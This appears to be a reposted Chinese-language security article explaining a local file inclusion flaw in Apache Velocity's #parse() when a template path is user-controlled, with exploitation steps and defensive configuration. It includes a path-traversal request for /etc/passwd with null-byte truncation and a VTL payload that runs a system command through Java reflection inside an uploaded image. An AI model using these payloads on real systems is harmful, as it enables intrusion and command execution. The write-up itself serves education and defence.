請登錄后使用快捷導航
沒有帳號？立即注冊

Velocity Parse()函數引發的本地包含漏洞及利用方法

2022-9-27 15:42| 查看: 2926 |來源: 互聯網

一背景及描述Velocity是一個基于java的模板引擎（template engine），它允許任何人僅僅簡單的使用模板語言（template language）來引用由java代碼定義的對象。我們知道，越是功能強大、函數豐富的渲染層語言（從某

一背景及描述
Velocity是一個基于java的模板引擎（template engine），它允許任何人僅僅簡單的使用模板語言（template language）來引用由java代碼定義的對象。我們知道，越是功能強大、函數豐富的渲染層語言（從某種意義上來說，PHP也可歸類為渲染層語言）越會帶來一些安全問題。
有人認為，velocity不能像jsp一樣編寫java代碼，是嚴格的mvc分離，所以相當安全。那么請看看這篇文章吧，相信看完之后你不會繼續這么認為:)
二什么是本地包含漏洞（LFI）
本地包含（LFI）是一項經典的web hacking技術，攻擊者目的是將可控的包含惡意代碼的文件引入，并以渲染層語言執行。由于語言特性（如include,require函數），此漏洞多發于PHP。
三Velocity Parse()函數
官方定義：The #parse script element allows the template designer to import a local file that contains VTL. Velocity will parse the VTL and render the template specified.
簡單來說，Parse()函數是用來引入包含VTL的模板
常見用法：
#parse( "me.vm" )
與之類似且易混淆的的是Include()函數，但需要注意的是，include函數引入文件內容不經過template engine處理。
常見用法
#include( "one.txt" )
然而，在實際代碼開發過程中，許多程序員會對變量進行拼接，寫出以下代碼（有不少真實案例，非YY）：
#parse("${path}.vm")
于是乎，當Path變量用戶可控時，漏洞產生了。
四利用條件
1.parse中的變量用戶可控
2.velocity的模版讀取不只限定在web目錄下
3.能夠截斷 www.jb51.net
尤其是后兩個條件，看似非�？量�。
但是如果仔細研究你會發現，不少架構師并不會將velocity模版目錄限定于WEB-INF甚至Webapp目錄下，這為我們的利用帶來了可能性。
所以，在velocity.properties中，類似以下的配置都是危險的
resource.loader = file
file.resource.loader.class = org.apache.velocity.runtime.resource.loader.FileResourceLoader
file.resource.loader.path = /opt/templates
file.resource.loader.path = /home/myhome/other_root_path
五利用方法
與傳統LFI利用并無大的差別，總結來說無非有3種類型
1.文件跳轉讀取敏感信息
http://test.com/index.php?page=../../../../../../../../../../etc/passwd%00
2.在上傳點上傳含有惡意vtl代碼的jpg等文件，然后通過LFI進行包含以使得正常文件以vm解析。
3.修改http包，在請求url或user-agent處攜帶惡意VTL代碼，再包含accesslog或/proc/self/environ以解析。
下面我們開始實戰，也是用的LFI的經典利用手法之一
Step1 我們在圖片文件中插入以下代碼:
#set ($exec ="thanks")$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")
Step2 上傳圖片至服務器
Step3 通過本地包含漏洞點，進行目錄跳轉并%00截斷

六防御方法
1.velocity.properties文件進行類似如下配置
resource.loader = webapp
webapp.resource.loader.class = org.apache.velocity.tools.view.servlet.WebappLoader
webapp.resource.loader.path=/WEB-INF/vm/
2.對用戶提交的的參數進行../過濾
七小結
國內關于java安全研究不多，明顯的例子就是struts漏洞，常年無人問津直至前段時間出了利用程序才在國內火熱起來。
安全最重要的是思路，漏洞并不只會發生在PHP上，希望本文能成為一個啟示

本文最后更新于 2022-9-27 15:42，某些文章具有時效性，若有錯誤或已失效，請在網站留言或聯系站長：17tui@17tui.com

·END·

站長網微信號：w17tui，關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明：本站部分文章和圖片均來自用戶投稿和網絡收集，旨在傳播知識，文章和圖片版權歸原作者及原出處所有，僅供學習與參考，請勿用于商業用途，如果損害了您的權利，請聯系我們及時修正或刪除。謝謝！

下一篇：查找Centos Linux服務器上入侵者的WebShell后門上一篇：Uread閱讀器拒絕服務漏洞的分析與解決

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域，為您提供最新最全的互聯網資訊，幫助站長轉型升級，為互聯網創業者提供更加優質的創業信息和品牌營銷服務，與站長一起進步！讓互聯網創業者不再孤獨！

掃一掃，關注站長網微信

精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

Velocity Parse()函數引發的本地包含漏洞及利用方法

大家都在看

相關分類

熱門排行

最近更新